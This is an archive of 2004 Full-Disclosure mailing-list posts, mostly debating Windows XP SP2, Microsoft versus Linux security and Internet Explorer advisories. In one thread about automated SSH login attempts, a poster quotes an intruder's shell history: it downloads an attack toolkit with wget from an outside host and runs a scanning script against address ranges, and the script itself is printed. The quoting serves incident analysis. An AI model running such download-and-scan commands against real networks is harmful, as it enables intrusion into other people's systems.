And as for backwards compatibility, OSS software generally doesn't have to worry about backwards compatibility, the source is advailble, so most of the time it's possible to make it work. Oh, and I find wine on linux offers better than M$, for my needs. You talk throughout your email about many people at home and then also insert this gem into it... So it is ok if you break older functionality if you supply the source? What on earth for? So someone can change it to make it work again for themselves? Does this apply to even a majority of the OSS users let alone masses of home users? Most people wouldn't know a compiler if it bit them on the little toe. Even if they had, the vast majority can't figure out how to protect themselves from things they should have been able to protect against for a while now with firewalls and such yet you figure they can go into some OS c code and tweak it to fit themselves better? I thought we had gotten past the idea that having source so you can modify it to make it work for your particular instance was such a huge benefit. This is a tremendous nightmare for source control and patching and ultimately security. Having source to look at to see what it is doing is a good thing, having source so you can modify it to suit your needs is less so. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of ktabic Sent: Tuesday, August 17, 2004 12:22 PM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] SP2 is killing me. Help? On Tue, 2004-08-17 at 10:33 -0300, James Tucker wrote: On Mon, 16 Aug 2004 12:52:53 +, ktabic [EMAIL PROTECTED] wrote: ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] lame bitching about xpsp2
I am trying to figure out from all of your posts if you are just a troll or truly think you are saying something that can help. You complain about the past and then complain about SP2 in the same breath like you are saying, I don't like what they did, so I don't like what they will ever do. This is pretty silly. You follow with an RFC rant, so even as MS has started following RFC very closely (too closely for some now who realize now they didn't want RFC compliance, they wanted MS to do it the *nix way) you still would whine because they are also working on extending the RFCs to make them more useful or not following de facto *nix standards even if they aren't RFC. Well its similar at people who refuse somit in block before having tried it, its just plain stupidity and their ego gets hurts thinking they might have to start from zero. I can't really understand what you are saying here but it sounds like you are concerned that you will have to learn Windows, is this your real problem? but after MacOS, i am pretty sure even M$ will use Unix as a base in future windows versions I do not work for MS but would be very comfortable in saying this will not occur. Had MS wanted to follow a *nix like path, they could have a long time ago... They were doing *nix back in 1980. Longhorn boast msh, the M$ shell. ( sh geez thats original ). Two things. First, have you seen Monad? If not, you might want to look at it before even trying to spout your normal uninformed opinion. You will probably find that someone is going to be trying to duplicate portions of that functionality in your favorite non-MS OS shortly. Second, now you are whining about names? The goal of M$ is to archieve total control of information, Err no, their goal is to maintain a profit and compete as a business like they always have. The Microsoft world is not so religious as you have been raised to think. I realize this is unknown to you. But have faith... M$ business model is a threat to our freedom, and i would like our childrens to have a choice, and not be formated the M$ way. Last I looked, MS wasn't the only OS writer out there and you aren't being forced to use it. How is it that your children won't have a choice? Or are you forecasting the death of the *nix derivitives? I hope not and expect you are wrong if you are, they have their uses. Your overall post is silly. You complain and whine saying MS is doing this this and that wrong but if there is any attempt on their part to correct things you just whine about that as well. Admit it, there is nothing that MS could do that would make you say, hmmm, maybe they have a good idea here. I can almost visualize the spittle forming on your lips as you type your responses. Dude, chill out. BTW, re some of your other posts. I recall nimda and I don't recall my Windows machines getting infected even though they sat on the internet. Sounds like it was a patching issue after all... You argue to use Windows like systems (e.g. OpenOffice), just not Windows. This simply points out you have a hard on for Microsoft, not that you have anything worth listening to. Making business users use non-Windows systems will not magically build in them a wish to learn more and become more computer proficient. Most business users don't really much like computers and view them as a necessary evil. Windows is tolerable because they have been using it at home and have a good idea on how to use it (which BTW, having all of those Windows machines at home helps reduce training costs at work). Slapping some alternative OS on the desktop be it Mac, BSD, *nix, or BeOS isn't going to cause a great desire to learn computers. Period. On the permissions thing. Windows could be locked down and run as non-admins ages ago. We did it in a corporate environment in 96 with NT. What were the results? People bitching because they couldn't load software they wanted to load that had nothing to do with work and a rebuild rate going from at least one machine a week (we had thousands of machines) to none in six months. Of course if you run a different OS, the user's won't complain about not being able to do what they want... Oh wait yes they will, some people thought the same for the Win31 to WinNT 4 upgrade because it was a different OS with a different look and different rules and more security. There are two benefits that a company would get right now if they jumped whole hog from Windows. 1. The misconception of lower cost of ownership because of reduced licensing costs and perceived reduction in cost of patching (*nix never has to be patched, it is never on the news). 2. Less chance of being penetrated by a worm or virus because they have avoided the mono-culture... What happens if this is very successful and you have a new mono-culture... Oops. My Windows machines I use do real multitasking, are stable, and are not prone to virii. In fact I can't recall the last virus I had, I think it might
RE: [Full-Disclosure] lame b!tching about xpsp2
Your computers can have different OSes on them, Your OS can run on different brands of computers, you can run different Office Suite packages on your different Oses (even Windows). Contrariwise, I can't run diesel in my gasoline engine, can't run jet fuel either. I can't easily take the heads from a Chevy and put them on a Ford. I can't put a bar of Ivory in my dishwasher and expect my dishes to turn out very clean. What is your point here. Shooting for computers as appliances for a majority of the users out there is a good and noble thing. They are, after all, simply tools. I personally don't want an appliance, but I am not a normal user like the vast majority of the users. To bring this back to security and the topic at hand. SP2 does not make it so a machine doesn't require patching. It is an attempt to reduce the rush sometimes required for patching. It may or may not fail in that regard but at the very least it is an attempt in that direction. All of your griping is simply griping against someone trying to make the environment better. If anything you should be pushing this update. You aren't going to get people to dump Windows no matter how much you rant about it. You might as well be tilting at windmills instead of Windows. Even if this updates doesn't fix everthing you think it should fix and in the way you think it should fix it, at least it is an attempt to fix it. So you don't have to cheer it or tell people it is the greatest thing, but you should tell people that their Windows machine is more secure with it than without it. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of devis Sent: Friday, August 13, 2004 11:39 PM To: Joshua Levitsky; Full-disclosure Subject: Re: [Full-Disclosure] lame b!tching about xpsp2 Do you buy devices ( car or dish washer ) that takes only one kind of petrol or one kind of washing powder ? No ? Cause that was the point made. And btw, nice signature Joshua, but i bet you get that all the time. lmao. - Oh i see, one of those on 'need to know' basis job, is it ? - Exactly, you get to know only what you need to know ! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] lame bitching about xpsp2
. It isn't there yet and at present, the interface is still chasing what MS has, not revolutionizing it. You obviously also do not understand the concept of a monopoly. A monopoly is when there is only one supplier of a good or service, there is no choice period. This does not describe situation we have. Anyway, it isn't an end to monopoly you are looking for. It is an end to MS, if SUSE (or name your fav vendor) should all of a sudden become immensely popular and own 99% of the desktops you would be singing some religious hymn about it. Not touting how bad monopolies are. Criticism is absolutely not banned, but if you are going to criticize, understand what you are talking about. You run around spouting half truths and incorrect information intermixed with religious quotes like it means something simply because you believe it must be so probably because you have heard it from 14 other religious zealots. Define security ? Define company Policy of Internet and Computer usage ? Consider the real world. We actually didn't back down on our stance of what we did, though we took a beating for a long time over it. Even the lower costs of support didn't quell the complaining. While it is true the PCs are the company's PCs and any way they want to configure them is up to them, they also have to look at whether or not the configuration causes a slow down in productivity. If people are always bitching because they can't load their favorite news program (pointcast was the big one back then) productivity goes down. You can threaten the people with disiplinary action but you can't fire your entire marketing department or treasury department. So thats the reason to still give administrator rights to the default install ? Do you realise that unpatched machines get infected in a breeze because the default user has Administrator rights ? If I install Linux or BSD right now from CD, do I or do I not have root access? Am I allowed to log on and use root? The cost in patching is nothing compare to cost in software licensesand that's what it was about. LOL! At home, I completely agree with you. Get a job in a large company some time. And by large I mean hundreds of thousands of machines. Are you an idiot ?? Do you understand technically why a virus CANNOT EASILY spread on a nix based permissions filesystem ? If not, look up to Nope, and contrary to your writing I don't believe you are either. I just think you may be misinformed and bit too far into the zealot stage. You seem to think that every issue is due to some hole, totally disregarding the issues with users simply doing anything they are told to do in an email or instructions. Is it tougher to spread something in the *nix world, yes. Is it because it is inherently safer? No. My Windows machines I use do real multitasking, are stable, and are not prone to virii. Yours. The average compromised box out there isn't. And in 90 % of the cases, it is a M$ machine. Coincidence ? Sure Nope, not at all. Consider the penetration of Windows compared to anything else. Windows has more dumb users than any other operating system in the history of computers. Simple fact, you can't get around it. If they all jumped to Mac OSX, Mac OSX would have the most dumb users in the history of computers. As surely as that number moving so would the most attacked and penetrated platform numbers move. If the level of intelligence and capability of Windows users came up to the level of Linux users and especially of BSD users then many issues would slide into the background. Unfortunately for Linux, its user's intelligence averages are going to go down as they get more penetration of the desktops. Watch how Linux gets dumbed down for their use and as issues start to creep in more and more. 1) Get your facts right before defending some company that obviously you don't know. Ever read the EULA ? I doubt. 2) Accept that Cristicism will always enrich our vision and accept that people CAN, and SHOULD for obvious reasons, not feel part of that MASS that you embrass. Happy to feel normal ? I agree with these statements. Get your facts straight. As for criticism, I fully accept it. I dish out far more of it to MS than I think you ever will, I just tend to do it in a forum that will accomplish something. I have had MS chasing me down for pissing them off. I have also watched them slowly trying to get better. As I always say on this list, I don't look at this as religion. I think religion as screwed the world up enough. A lot of stupid people saying and doing a lot of stupid things in the name of religion, whether than be for a god or for an OS. So now, to bring this back... Do you have any valid gripes about XP SP2 that have encountered, or is your entire story one of whining about things you don't really know about? -Original Message- From: devis [mailto:[EMAIL PROTECTED] Sent: Monday, August 16, 2004 3:23 PM To: joe; Full
RE: [Full-Disclosure] SP2 is killing me. Help?
The worst problem I have encountered with XP SP2 to date on 3 virtual machines and two physical machines is the physical machine with dual monitors needed two reboots after the install to get the display up on the extension monitor. I got a Windows Popup saying a piece of software needed an update (Nero) for this version of Windows with an actual link to the company's website, that was pretty nice and dare say not many OS vendors do things like that. I can't say that I am not annoyed by some of the changes such as all the new security dialogs that pop up and such, but being annoyed isn't a valid reason to gripe when we have been telling MS to fix their stuff and they actually make the attempt. Telling me something is trying to download a file in IE or that an installation file I am trying to run isn't from a known publisher is enhanced security, no matter how annoying it may possibly be. :o) What are the specific issues you personally have encountered? We don't need people running around quoting other stories and other complaints about how bad it was for some other person they read about or heard about through the grapevine. Basically if you don't have an issue that you specifically encountered YOURSELF on YOUR MACHINE that you are looking to tell people about to get help or document the workaround/fix, shut up, here and everywhere else. Stop wasting bandwidth. The only person who wants to hear your opinion on the Service Pack is you. Stories of people's issues with RC2 which is the link you posted really shouldn't hold back people from installing RTM. Install it, sort out the issues, work to correct them. Re: your SP statement... In the mid/late 90's Microsoft was going to attempt an SP every quarter as NT4 was still pretty fresh. I think SP2 was Jan 97 or so, and SP3 was May 97 or so. That would have fit the schedule they were trying for. I believe they backed off of that because it was too much for them internally AND corporate customers such as the bank I worked for at the time requested them to slow down since corporate IT groups had troubles getting a full SP tested and out the door every quarter. The same reason corporate IT groups requested MS release hot fixes once a month instead of whenever unless the fix was ready and there was an immediate threat. As several others on this list have pointed out multiple times, this Service Pack will break some things. First off, all Service Packs tend to break things because they are changing functionality and fixing mistakes and some companies depend on those mistakes or the functionality being a very specific way with no exception process when it isn't that exact way. Additionally, Microsoft has been admitting that this SP would be extra harsh for some time which is why they had such an open beta and RC testing phase. They wanted to try and catch as much as possible prior to the release. People inside of MS didn't have a choice but to run the betas and RCs. If the employees didn't load it, it got forced down onto their machines anyway. MS was very diligent about chewing each piece of it. Still, things will break. How can you not expect them to break? People have been whining here for some time that MS is doing this and this and that wrong and paying too much attention to legacy apps and worrying about breaking them. Now MS has said, ok, we will work towards security and not be as worried about apps that people currently run. They haven't been as aggressive in that area as they could be and that was a complaint I had. However seeing the whining produced based on how aggressive they were, makes me realize why they chose not to be as aggressive as they could have been. Just because something ran before and doesn't run now doesn't mean it is Microsoft's fault. It could be that the vendor or local programmer who wrote the program that doesn't work for you now simply didn't do it correctly. There are a lot of crap apps out there written by people with no security understanding and very little programming understanding. Hopefully this will encourage some of them to get better. Plain and simple, you can't complain that MS is doing a poor job at trying to get better and then in the next breath complain about changes they make to try and do a better job. If MS doesn't change things, things have no chance at getting better. So you can whine that MS isn't doing anything to make the OS better or you can whine that they are changing things and breaking stuff. You can't do both. There will be issues, no one writes perfect code. No one will EVER write perfect code. Doesn't matter if it some guy in his basement working on some open source project or some guy in Building 41 on Microsoft's Redmond Campus working on an MS OS kernel. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Darren Reed Sent: Thursday, August 12, 2004 1:29 AM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] SP2
Re: [Full-Disclosure] (no subject)
Kaspersky detect it as I-Worm.Bagle.al Todd Towles wrote: I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB) There appears to be some people on FD that are infected and we are getting a lot on my end. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] SP is here (soon) !
XP SP2 Final is up on MSDN Downloads for the MSDN Subscribers. English and German as of right now. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Marc Rees Sent: Friday, August 06, 2004 12:59 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] SP is here (soon) ! Go to : http://www.microsoft.com/windowsxp/downloads/updates/sp2/cdorder/en_us/defau lt810.mspx I m french. So i select France in country section. And select Windows XP SP french CD in language section. Last click on Order now. Microsoft VBScript compilation error '800a03f6' Expected 'End' ?, line 0' Someone needs SP3 ;) Marc Rees www.acbm.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] New IE patch
Perfect timing for System Admin Day, a new IE patch http://www.microsoft.com/technet/security/bulletin/ms04-025.mspx ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Automated SSH login attempts?
you can decompile using REC. http://www.backerstreet.com/rec/rec.htm Andrei Galca-Vasiliu wrote: By the way, you have to be root to use ss: [EMAIL PROTECTED]:~/ssh$ ./go.sh 82.77.45 scanning network 82.77.*.* usec: 3, burst packets 50 using inteface eth0 ERROR: UID != 0 Intr-un mail de pe data de Thursday 29 July 2004 19:38, Stefan Janecek povestea: Hmmm - I have also been getting those login attemps, but thought them to be harmless. Maybe they are not *that* harmless, though... Today I managed to get my hands on a machine that was originating such login attempts. I must admit I am far from being a linux security expert, but this is what I've found out up to now: Whoever broke into the machine did not take any attempts to cover up his tracks - this is what I found in /root/.bash_history: -- id uname -a w id ls wgte frauder.us/linux/ssh.tgz wget frauder.us/linux/ssh.tgz tar xzvf ssh.tgz tar xvf ssh.tgz ls cd ssh ls ./go.sh 195.178 ls pico uniq.txt vi uniq.txt ls rm -rf uniq.txt ./go.sh 167.205 ls rm -rf uniq.txt vuln.txt ./go.sh 202.148.20 ./go.sh 212.92 ./go.sh 195.197 ./go.sh 147.32 ./go.sh 213.168 ./go.sh 134.176 ./go.sh 195.83 -- um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two binaries: go.sh: --- ./ss 22 -b $1 -i eth0 -s 6 cat bios.txt |sort | uniq uniq.txt ./sshf --- * 'ss' apparently is some sort of portscanner * 'sshf' connects to every IP in uniq.txt and tries to log in as user 'test' first, then as user 'guest' (according to tcpdump). This does not seem to be a stupid brute force attack, as there is only one login attempt per user. Could it be that the tool tries to exploit some vulnerability in the sshd, and just tries to look harmless by using 'test' and 'guest' as usernames? The compromised machine was running an old debian woody installation which had not been upgraded for at least one year, the sshd version string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10' As already mentioned, I am far from being an expert, but if I can assist in further testing, then let me know. Please CC me, I am not subscribed to the list. cheers, Stefan ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Automated SSH login attempts?
hi fd, got that too, starting at the 15.07. from these two addresses: 212.89.103.132 and 66.250.111.33 i have some ssh debug level 3 output from these attempts and tcpdupmp and sebek packets logged. but as the users are not existent on the systems, i don't think it would provide new info. if anybody wants to analyse the data, contact me offlist. joe -- 250 MB Mailbox, 100 FreeSMS/Monat, 1000 MB Online-Festplatte Jetzt GMX TopMail kostenlos testen http://www.gmx.net/de/go/topmail ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE
IBM doesn't actually offer support or at least didn't when we spent 18 months researching it last couple of years. I consulted for a company that was looking at IBM heavily because the current CIO previously worked for IBM. The 18 months was spent going over the various offerings and statements IBM made when trying to get standards in place to deploy Linux in any serious non-backroom way. The big quote going around in the trenches was that IBM better have some pixie dust because what we are seeing in the real world doesn't stack up for their claims. Basically the support falls through to the vendor from which you separately buy the OS from, Red Hat or Suse were the options. The big thing IBM offered was that they would help you write custom code against the various versions but the costs were extremely substantial and then you were in a weird zone of support where the people we spoke to couldn't really say how we would be supported but that they would try to get the changes we paid for implemented in the main source tree so we could be supported by the OS Vendor. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Rodrigo Barbosa Sent: Monday, July 19, 2004 5:22 PM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] IE -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Mon, Jul 19, 2004 at 03:00:31PM -0500, [EMAIL PROTECTED] wrote: In addition to the below, my company's management wants to buy it's software from some big player. Open source software isn't supported, they say. Fine. Have them talking to RedHat, or even IBM. Yes, I think IBM is a big enough player. - -- Rodrigo Barbosa [EMAIL PROTECTED] Quid quid Latine dictum sit, altum viditur Be excellent to each other ... - Bill Ted (Wyld Stallyns) -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.3 (GNU/Linux) iD8DBQFA/DtipdyWzQ5b5ckRAvwmAJ9lZHIPx4oNxrwk9ep93B6EAWxHHQCdF/U7 oy2rlD0DNhKq2DvSaHNVM2M= =Xy1D -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] How big is the danger of IE?
http://www.kb.cert.org/vuls/id/713878 The link above is the advisory that theregister is talking about. I know it is unusual for theregister but they seemed to have missed a hefty part of the whole advisory when reporting it. Here is the specific section: III. Solution Until a complete solution is available, consider the following workarounds. Disable Active scripting and ActiveX Disabling Active scripting and ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this vulnerability. Disabling Active scripting and ActiveX controls in the Local Machine Zone will prevent widely used payload delivery techniques from functioning. Instructions for disabling Active scripting in the Internet Zone can be found in the CERT/CC Malicious Web Scripts FAQ. See Microsoft Knowledge Base Article 833633 for information about securing the Local Machine Zone. Also, Service Pack 2 for Windows XP (currently in beta release) includes these and other security enhancements for IE. Apply the Outlook Email Security Update Another way to effectively disable Active scripting in Outlook is to install the Outlook Email Security Update. The update configures Outlook to open email messages in the Restricted Sites Zone, where Active scripting is disabled by default. In addition, the update provides further protection against malicious code that attempts to propagate via Outlook. The Outlook Email Security Update is available for Outlook 98 and Outlook 2000. The functionality of the Outlook Email Security Update is included in Outlook 2002 and Outlook Express 6. Outlook 2003 includes these and other security enhancements. Read and send email in plain text format Outlook 2003, Outlook 2002 SP1, and Outlook 6 SP1 can be configured to view email messages in text format. Consider the security of fellow Internet users and send email in plain text format when possible. Note that reading and sending email in plain text will not necessarily prevent exploitation of this vulnerability. Maintain updated anti-virus software Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. US-CERT maintains a partial list of anti-virus vendors. Do not follow unsolicited links Do not click on unsolicited URLs received in email, instant messages, web forums, or internet relay chat (IRC) channels. While this is generally good security practice, following this behavior will not prevent exploitation of this vulnerability in all cases, particularly if a trusted site has been compromised or allows cross-site scripting. Use a different web browser There are a number of significant vulnerabilities in technologies relating to the IE domain/zone security model, the DHTML object model, MIME type determination, and ActiveX. It is possible to reduce exposure to these vulnerabilities by using a different web browser, especially when browsing untrusted sites. Such a decision may, however, reduce the functionality of sites that require IE-specific features such as DHTML, VBScript, and ActiveX. Note that using a different web browser will not remove IE from a Windows system, and other programs may invoke IE, the WebBrowser ActiveX control, or the HTML rendering engine (MSHTML). -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Skander Ben Mansour Sent: Thursday, July 08, 2004 3:59 PM To: 'Yaakov Yehudi'; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] How big is the danger of IE? SNIP CERT recently recommended using a different web browser: http://www.theregister.co.uk/2004/06/28/cert_ditch_explorer/ http://www.us-cert.gov/current/current_activity.html#iis5 There are a number of significant vulnerabilities in technologies relating to the IE domain/zone security model, the DHTML object model, MIME type determination, and ActiveX. It is possible to reduce exposure to these vulnerabilities by using a different web browser, especially when browsing untrusted sites. Such a decision may, however, reduce the functionality of sites that require IE-specific features such as DHTML, VBScript, and ActiveX. Note that using a different web browser will not remove IE from a Windows system, and other programs may invoke IE, the WebBrowser ActiveX control, or the HTML rendering engine (MSHTML). I hope this helps. Best Regards, Skander Ben Mansour -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Yaakov Yehudi Sent: Thursday, July 08, 2004 7:59 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] How big is the danger of IE? I would be interested to hear just how big the danger of IE is. How could it affect the privacy of big business?, or any business for that matter? or what about the Government - could information leak from govenrment
RE: [Full-Disclosure] How big is the danger of IE?
I'm trying to understand if your issue you are implying sarcastically in your last statement is with pulling similar functionality out of single programs and putting it into DLLs or that MS offers products to do many different things or that you can seamlessly work with documents across applications thereby more easily putting them together (instead of saying building a spreadsheet in excel working on formatting it, print it separate, then take a word doc and print it separate and then collate the sheets together). Thanks, joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Eric Paynter Sent: Thursday, July 08, 2004 12:23 PM To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] How big is the danger of IE? On Thu, July 8, 2004 8:07 am, Sapheriel said: i didn't know IE also displays e-mails and power point files. It doesn't. But the IE rendering engine (read: dlls) are used by most MS programs to render HTML, which can be embedded into almost any document type. Pretty much any IE exploit will work in any of these programs as well. Isn't the whole integrated Microsoft suite a wonderful concept? -Eric -- arctic bears - affordable email and name services @yourdomain.com http://www.arcticbears.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE Web Browser: Sitting Duck
Holy crap, I can not believe I totally forgot about adventure... We took it straight away and ported it to BASIC-PLUS because on RSTS/E that was one of the RTSs (shell if you will) and was interpreted so we could change it without sending it to batch overnight for the compile like we had to do with F77. One of my CompSci instructors wanted me to rewrite it in Macro for my MASM final project to show it could be done. I kept showing him the code along the way and he was quite surprised when it actually ended up being a Reverse-Polish functional scientific calculator complete with graphics on the VT-52 when I handed it in. I always had a feeling he didn't really know what he was reading when looking at code, especially MASM, that was the final proof. :o) joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Dave Horsfall Sent: Wednesday, July 07, 2004 2:17 AM To: Full Disclosure List Subject: RE: [Full-Disclosure] IE Web Browser: Sitting Duck On Wed, 7 Jul 2004, joe wrote: Of course you had FORTRAN and COBOL as well but you couldn't do fun games in those. You mean like Adventure? I still have the original FORTRAN source for that somewhere on a tape. -- Dave ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE Web Browser: Sitting Duck
I don't think anyone can propose a realistic test at this point in time. I don't think one is possible until you get some sort of large non-techno weenie installed based going for the *nix or another OS for that matter. As another poster pointed out, the diversity and chaos in the open source world right now helps contribute to its safety as there is no large exposed surface in terms of Microsoft large. Plus MS simply makes good news. Once more non-weenies hit the OS and start doing things, something will start to take a majority because friends will tell their other friends about this specific version and the people running it won't be of the type to keep swapping things around and trying other things and someone will come up with some decent marketing or distribution method that appeals to the mass market. In terms of marketing and distribution right now from what I see that could very well be Lindows aka Linspire. I'm waiting for them to start giving away Lindows PCs to schools actually like Apple did/does. They have Apple beat because while a school could get it cheap, little billy at home wasn't so lucky as mom and dad looked at the price in the store and said no way. Do that with Lindows PCs, then mom and dad go to Walmart because billy talks about how he likes it so much and low and behold they see on shelf a whole PC for $300 or so dollars. Hopefully they keep Lindows on it instead of realizing, hey this isn't what mommy and daddy like and go to ebay and buy a pirated copy of XP that can't be updated with security fixes because MS in its infinite wisdom decided that people who don't buy legit don't get to have security. You want to complain about MS, complain about that. I can say in my experience that I have seen fewer RSTS/E worms and viruses than *nix but it doesn't mean it is more secure. At that point though there weren't lists going around distributing the holes to the kids to exploit and people going oh my god, DEC is evil, RSTS/E sucks, SunOS is MUCH better and more secure. If we found a really bad issue, we would tell DEC and we would tell any companies we were friendly with that we knew were running the same thing. I guess we weren't quite as religious then. If we wanted religion, we went to church. We simply used computers to do our jobs. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Bruce Ediger Sent: Wednesday, July 07, 2004 8:41 AM To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] IE Web Browser: Sitting Duck SNIP Can you propose a test of the install-based theory? If not, I wish you wouldn't use it, it's little more than special pleading for the use of Microsoft products. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE Web Browser: Sitting Duck
Actually MS does support the use of alternative shells. However you couldn't and shouldn't expect that if you have a say Thunderbird shell that MS would support that shell, just the pinnings under it. Just like they don't support say, Lotus, but they do support the underlying OS API calls. As for breaking things, it goes back to the same DLL point. If an app is built on the concept that that shell would be there and has dependencies on it, yes it will break. The only thing I can say to that is yeah, of course. Most of the GUI admin tools from MS depend on those shell dependencies, again, to that I say... Of course. However if you want to write your own, you can. The Windows API core pieces are still there and fully exposed and you don't have to use the Shell API calls and avoid the Shell DLLs. It will take you a bit longer to write anything though I would expect unless you have already built up your own lib. There are many embedded and POS and other machines running Windows and not using the Explorer shell. They are still called Windows machines. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Barry Fitzgerald Sent: Wednesday, July 07, 2004 9:56 AM To: joe Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] IE Web Browser: Sitting Duck joe wrote: It is a core component of the current Windows UI, this is not the same as being a core component of Windows. Explorer is simply a UI shell that sits on the operating system known as Windows. The entire shell is replaceable and has been for a long time, since at least Win3.1. I appreciate the technical explanation even though I knew, well, all and more of it. You probably could have saved some time if you had read my relatively short message fully and seen that I did acknowledge that IE is not part of the kernel (which is really what you're trying to say) and that it's a part of MS Windows as a software distribution. I'm fully aware that you can replace the shell in windows. However, IE and the windows UI is a part of MS Windows as a software distribution and it's an essential part. I dare say that if you remove the UI and DLLs of MS Windows, all you have left is a relatively crappy kernel with a lot of software that won't work. The MS Windows UI and Internet Explorer are a core part of the MS Windows operating system. When you remove them, you break compatibility with many of the available programs and I'd venture to say that Microsoft would not support a highly modified system like the ones that you're describing. One can remove the Glibc from any GNU/Linux distribution. I wish them luck trying to run programs that are dynamically linked. Is the Glibc a core part of Linux the kernel? Of course not. Is the Glibc a core part of the GNU/Linux OS distribution? Yes, it is. I think that for all of the technical explanations that you've given, you're losing the argument on one simple phrase: software distribution. -Barry p.s. Come on people. We went through the what does an OS really constitute? argument back in like 1996. This isn't bloody kindergarten. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] What a difference a char makes...
Thanks Nick, you should find this corrected now. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Nick FitzGerald Sent: Saturday, July 03, 2004 1:00 AM To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: [Full-Disclosure] What a difference a char makes... MS does it again... I'm not sure whether to laugh or cry. http://www.microsoft.com/security/incident/Download_Ject.mspx ... Actions for Home Users ... 2. Check for Infection ... 3. At the command prompt, type: dir /a /s /b systemdrive%\kk32.dll and then press the ENTER key to search your computer. If the file is present, the file path is displayed. If the file is not present, a message is displayed that the system cannot find the path. There's no prize for spotting the typo, nor for guessing what your typical home user's reaction will be if they actually follow this advice. On reflection, perhaps there should be a prize for the latter, as accurately guessing that could be quite tricky. Due to the error (repeated in step 4 -- the glories of cut'n'paste...) the user will receive a possibly quite long directory listing (after all, at least on Win2K and XP the default directory for the command prompt will be the current user's homepath directory which houses, by default, as one of its many sub-directories, IE's TIF) followed by the message, as the very last line of output: The system cannot find the path specified. ... Does MS not employ technical writers? What about tech reviewers? What about the age-old publishing concept of having some vaguely clueful person _who had nothing to do with the generation or layout of the content_ look critical new web pages over before publishing them? OK, so this is the web, but critical information still does not deserve an attitude of it's just the web, does it? The odd spelling mistake on the Office or IIS marketing pages we may accept, but getting something so badly wrong that anyone with two days experience of real system administration would spot in an eye-blink _AND_ with such potentially confusing results is pretty darn shoddy even by MS' own long history of shoddy security standards... Could it be worse? Well, the page has not been posted long enough for Google to have 